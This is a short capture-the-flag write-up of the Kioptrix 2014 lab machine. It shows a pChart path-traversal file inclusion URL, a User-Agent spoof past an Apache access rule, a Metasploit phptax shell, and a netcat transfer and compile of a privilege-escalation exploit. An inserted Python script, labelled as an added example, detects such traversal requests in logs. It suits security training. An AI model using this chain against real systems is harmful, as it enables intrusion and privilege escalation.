Kioptrix 2014

Questions: teh3ck [at] gmail [dot] com

Port Scan

Nmap scan report for 192.168.1.87
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy

Source code of index.html

pchart

Local File Inclusion:

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
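
Detecting this in the logs (an added example, not part of the original write-up): the script below scans Apache access-log lines for requests to the pChart examples page whose Script parameter is an absolute path or contains "..", including double-encoded forms. The log layout, the sample lines and all function names are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common/combined log line: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(script):
    """True when the Script value is absolute or climbs out of its directory."""
    path = decode_fully(script).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")

def find_lfi_attempts(lines):
    """Return (client, decoded Script value, HTTP status) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/examples/index.php"):
            continue
        for script in parse_qs(url.query).get("Script", []):  # parse_qs decodes once
            if is_traversal(script):
                hits.append((client, decode_fully(script), int(status)))
    return hits

# Constructed sample lines for the demonstration (not real log data).
SAMPLE = [
    '192.168.1.88 - - [10/Apr/2014:12:00:00 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 512',
    '192.168.1.50 - - [10/Apr/2014:12:00:05 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.basic.php HTTP/1.1" 200 2048',
    '192.168.1.50 - - [10/Apr/2014:12:00:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE):
        print(hit)
```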

Log files:

ErrorLog "/var/log/httpd-error.log"  
CustomLog "/var/log/httpd-access.log"


SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>  
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">  
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>  

Changed the User-Agent to Mozilla/4.0 Mozilla4_browser

phptax

msf

options

shell

interactive shell
/bin/sh -i

Privilege escalation exploit

http://www.exploit-db.com/exploits/28718/

Transferring the spl0it

Kioptrix Machine
$ nc -nv 192.168.1.88 10000 >r00t.c

Attacking machine
cat r00t.c | nc -l 192.168.1.87 10000

Compiling

gcc r00t.c

W00t

r00ting


Thanks loneferret for providing that awesome challenge and g0tmi1k for hosting it!